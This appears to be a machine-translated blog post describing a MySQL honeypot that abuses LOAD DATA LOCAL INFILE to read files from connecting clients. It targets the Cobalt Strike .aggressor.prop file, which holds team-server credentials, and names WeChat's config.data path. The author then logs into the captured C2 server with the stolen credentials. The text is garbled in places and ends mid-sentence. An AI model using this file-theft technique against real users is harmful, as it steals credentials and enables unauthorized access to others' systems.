Title: Mysql honeypot reads computer configuration files

There are too many articles on the Internet about the specific technical details of Mysql honeypot. You can search for articles online by yourself. I will write an introduction: There is a load data local infile function in mysql that can read local files into the mysql database. When an attacker scans our mysql password with a scanner that explodes mysql password and connects it (note, I will correct it here. Just connect mysql to mysql and you can read the local configuration file by the honeypot. There is no need to provide the correct username and password), the client (the attacker) will automatically initiate a query, and we (the server) will give a response. We add a load data local infile to the response packet to read the attacker's local file into our database to achieve the purpose of countermeasure. (The following pictures are from the Internet search)

cs' configuration file plaintext storage password

As long as you use the CSS client to connect to the computer that has used the CSS server, the CSS client will generate a .aggressor.prop configuration file in a fixed folder. If it is a Windows system, the file location is: C:\Users\Administrator\.aggressor.prop. This configuration file contains the IP address, port, username and password of CSS remote control, and it is all in plain text! As shown in the figure below:

Every time you open the cs, you will display the IP address, port, username, password and other information you have logged in. These information are stored in the local .aggressor.prop file. The general content is shown in the figure below:

Therefore, we came to the conclusion that we built a mysql honeypot. Once the attacker connects to the honeypot, the honeypot uses the msyql local file reading vulnerability to automatically read the content of the C:\Users\Administrator\.aggressor.prop file. The honeypot can successfully obtain the attacker's CCS server IP address, port, username and password.

Successfully built an environmental experiment

In order to verify the above guess, we still need to test it in practice. Find a mysql honeypot script written in python from github, and simply modify it locally, change the path of the file reading to C:\Users\Administrator\.aggressor.prop, and run the script. As shown in the figure below, a mysql honeypot listening to local port 3306 is built.

In order to simulate the behavior of red team personnel connecting to mysql, use Navicat to remotely connect the IP address of this honeypot. (To emphasize again, there is no need to know the username and password of mysql. Enter an incorrect username and password. Mysql honeypot can also read local files)

As shown in the figure below, the mysql honeypot gives the content of the base64 encrypted cs configuration file in the log file of the current directory.

The result after Base64 is decrypted is as follows:

马云惹不起马云

The IP address, port, username and password obtained successfully were connected to the CSS server (the following pictures are from the Internet)

Under Windows, the default configuration file for WeChat is placed in C:\Users\username\Documents\WeChat Files\. If you look through it, you will find that C:\Users\username\Documents\WeChat Files\All Users\config\config.data contains WeChat IDC:\Users\backlion\Documents\WeChat Files\All Users\config\config.data